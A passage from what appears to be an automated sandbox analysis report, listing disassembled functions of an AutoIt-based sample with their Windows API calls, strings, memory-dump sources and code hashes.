                                    • Opcode ID: de677eb75576c2e29b45dd1cae61c1ee2994539d9eadfe6622b6bfb8f484fd34
                                    • Instruction ID: 429958fa91cfba24c26a8071640c7577debc8c78e3df1fae40de487859c6f99a
                                    • Opcode Fuzzy Hash: de677eb75576c2e29b45dd1cae61c1ee2994539d9eadfe6622b6bfb8f484fd34
                                    • Instruction Fuzzy Hash: 75E0F102B0472060C3701239DCC597F868DEFC6750310082BF980C23E6EBC8ECA183A5
                                    Function 007E0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007E0B23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Message
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 2030045667-4017498283
                                    • Opcode ID: 4506f0351100fc968d589e85ec56427563921a30ebc3b10cbb3ffef32d431340
                                    • Instruction ID: a58f01de210f500332acc3ceb5ecd8d40bdaf4ea448bee200e29ca8bc581a377
                                    • Opcode Fuzzy Hash: 4506f0351100fc968d589e85ec56427563921a30ebc3b10cbb3ffef32d431340
                                    • Instruction Fuzzy Hash: B4E0923128430866D21036947C07FC97A88EF06B10F100426F758D55C38AEA289006E9
                                    Function 007A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0079F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007A0D71,?,?,?,0078100A), ref: 0079F7CE
                                    • IsDebuggerPresent.KERNEL32(?,?,?,0078100A), ref: 007A0D75
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0078100A), ref: 007A0D84
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007A0D7F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 55579361-631824599
                                    • Opcode ID: 73f31f5862c6615388d12f655e94321e20e7d8236ce48a9f38c81777cda1a312
                                    • Instruction ID: 12708709e43ad0295824c0a79a05cf234d5bf61c69e2ad4a05dc9b0c0bef84a4
                                    • Opcode Fuzzy Hash: 73f31f5862c6615388d12f655e94321e20e7d8236ce48a9f38c81777cda1a312
                                    • Instruction Fuzzy Hash: 81E06D742007018BD7609FB8E4083827BE8BF01741F008E2DE486CA752DBBCE4888BD1
                                    Function 007DD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: %.3d$X64
                                    • API String ID: 481472006-1077770165
                                    • Opcode ID: a168d56307345c0147a89f84a96c5f2aeba34fed44dd4f705e95c8a233579c45
                                    • Instruction ID: 677c77b4d5b6ce760428f8b071209bfc2b3fb41652d96546c3acb1cc1b4fdfae
                                    • Opcode Fuzzy Hash: a168d56307345c0147a89f84a96c5f2aeba34fed44dd4f705e95c8a233579c45
                                    • Instruction Fuzzy Hash: 8DD012B1848108EACF609AE0DD498F9B37CFB18341F508453F806D1240D63CED086761
                                    Function 00812322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0081232C
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0081233F
                                      • Part of subcall function 007EE97B: Sleep.KERNEL32 ref: 007EE9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: ca44c14b9188eecf2e2b0d1c48a97fdc4995d353859313c42b0f8bfd7ee98525
                                    • Instruction ID: 9bc1bb70259d718ddac8f91ed3df0743949318f32ac16f0f898a3fa5c70629cc
                                    • Opcode Fuzzy Hash: ca44c14b9188eecf2e2b0d1c48a97fdc4995d353859313c42b0f8bfd7ee98525
                                    • Instruction Fuzzy Hash: AED0A9323C0300BAE2A4A770DC0FFC6AA08BF00B00F008A167205AA1D0D8A4A800CA00
                                    Function 00812356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0081236C
                                    • PostMessageW.USER32(00000000), ref: 00812373
                                      • Part of subcall function 007EE97B: Sleep.KERNEL32 ref: 007EE9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 92ba9f6dea78c2f1ca1ac864754035d57f2593c8080f88b586d5caa8e830482b
                                    • Instruction ID: 5702ef40ea9a107071711c24d36abbac57fbdbf8e5975ef205f62b3013e97035
                                    • Opcode Fuzzy Hash: 92ba9f6dea78c2f1ca1ac864754035d57f2593c8080f88b586d5caa8e830482b
                                    • Instruction Fuzzy Hash: 7ED0A9323C1300BAE2A4A770DC0FFC6A608BB04B00F008A167201EA1D0D8A4B800CA04
                                    Function 007BBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 007BBE93
                                    • GetLastError.KERNEL32 ref: 007BBEA1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007BBEFC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: 2d1216d981df1190f43e9dba38fb4eba3b8ed71975da489fdac5a8ef63a9fbf7
                                    • Instruction ID: f3d19ec39489389d7fc0b2da6e8b5ea48b169c972edf3ea581c73a18d48eadd6
                                    • Opcode Fuzzy Hash: 2d1216d981df1190f43e9dba38fb4eba3b8ed71975da489fdac5a8ef63a9fbf7
                                    • Instruction Fuzzy Hash: 7C41E735605206EFCF218FA5CC88BFA7BA9EF42710F144169FD59971A1EBB48D01DB50